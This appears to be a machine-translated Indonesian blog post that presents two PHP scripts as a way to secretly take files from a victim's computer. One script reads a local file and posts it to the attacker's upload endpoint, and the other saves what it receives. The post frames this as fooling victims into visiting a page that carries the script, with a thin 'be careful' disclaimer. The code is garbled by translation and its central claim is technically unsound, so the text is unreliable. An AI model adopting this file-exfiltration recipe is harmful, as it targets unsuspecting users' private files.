3:11 PM
Kajetz
Before I clarify the content of the title, I ask for what is practiced here is not to be a negative thing for other people. If you want to practice with madsud evil, everything is not my responsibility.
Okay, back to topic. You would not suspect, when one time I knew what the plan behind the data you store on your computer. I do not need to call the shaman and stay up all day to wait for the father shaman completed its action, he .. he .. he. Did you know? with the script PHP following, file -file is on the client computer can be taken easily and tucked in your server. Enough to fool the victim to open a site that was inserted this script, then it will automatically retrieve (upload) to the path of your destination server.
Here's the script:
1. First file
<?
/ / This script is created that understand PHP
/ / File Name: ScrCuri.php
/ / Function: Processing sending files to the server
$ Host = 'localhost';
$ Port = 80;
/ / Change the path variable position location upload.php
$ Path = '/ upload.php';
/ / Change the variables fileku with the file you want to take
$ Fileku = "c: \ \ \ autoexec.bat ";
$ Content_type = "text / plain"; / / mime type file
/ / Start Header
srand ((double) microtime () * 1000000);
$ Boundary = "---------------------------". substr (md5 (rand (0.32000)), 0.10);
$ Data = "- $ boundary";
$ Content_file = join ("", file ($ fileku));
$ Data .= "
Content-Disposition: form-data; name = \ "fileku \"; filename = \ "$ fileku \"
Content-Type : $ content_type
$ Content_file
- $ Boundary ";
.="-- $ Data \ r \ n \ r \ n ";
$ Msg =
"POST $ path HTTP/1.0
Content-Type: multipart / form-data; boundary = $ boundary
Content-Length : ". strlen ($ data)." \ r \ n \ r \ n ";
/ / End Header
$ Result = "";
/ / Open Connection
$ F = fsockopen ($ host, $ port);
fputs ($ f, $ msg. $ data);
/ / Get the response + results
while (! feof ($ f))
{
$ Result .= fread ($ f, 32,000);
}
fclose ($ f);
/ / Print results
echo $ result;
?>
2. Second file
<?
/ / File Name: upload.php
/ / Function: Catching the contents of the header or the request is sent and the process of copying files from client
if (is_uploaded_file ($ fileku))
{
/ / Change the variables namasimpan appropriate storage file path that you want
$ Namasimpan = "/ backup_backup_backup / test / autoexec.bat"
copy ($ fileku, $ namasimpan);
/ / Show results
echo "OK";
} Else {
echo "Failed to copy file>> '$ fileku'.";
}
?>
Well, after you save your script on the server / host you. So, to prove it scrcuri.php try accessing the script. Ex: http://bloganda.com/scrcuri.php, remember! configuration must match lho ... let you easily, save aja two files in the root servers you so, accessed on http://situskamu.com/upload.php upload.php file. Already understand ??... Yep ... I hope so .. he .. he .. he. To try to access the script scrcuri.php on windows environment ... what happened? Wowww ... an autoexec.bat file in server you have been sipped, the alias is taken from your client computer as an experiment.
Before you feel satisfied, you should know that the script above, not perfect (So do not be satisfied .... first.) Want to know the shortcomings ???.. Yeahhh ... I know you also know iya khan?. We know, in our experiment file ... only able to retrieve certain files that do not necessarily have a target computer. Suppose that wrote the file c: \ tomero.gif, automatically all the computers do not necessarily have a file like that. So, the solution .. aja add a bit of javascript and manipulating both the script above ... Tau khan .. tau aja Biarin k'lo guns at home for homework or learn PHP if necessary before the buaaanyaaakk. Guns could be as well? Kick the most telling is that, Copy-Paste aja ... "The basis of lazy ... he .. he .. he ..
Finally, once again ... everything contained on this info, their role in the hands of you. I just write and develop ideas with madsud for you to be careful with the world of the Internet , although somewhat asyikkk ... Sorry, if there are errors or things that are less pleased with your hearts. Thank you.
0 comments:
Post a Comment
Silahkan anda berkomentar, tapi jangan nyepam . . . .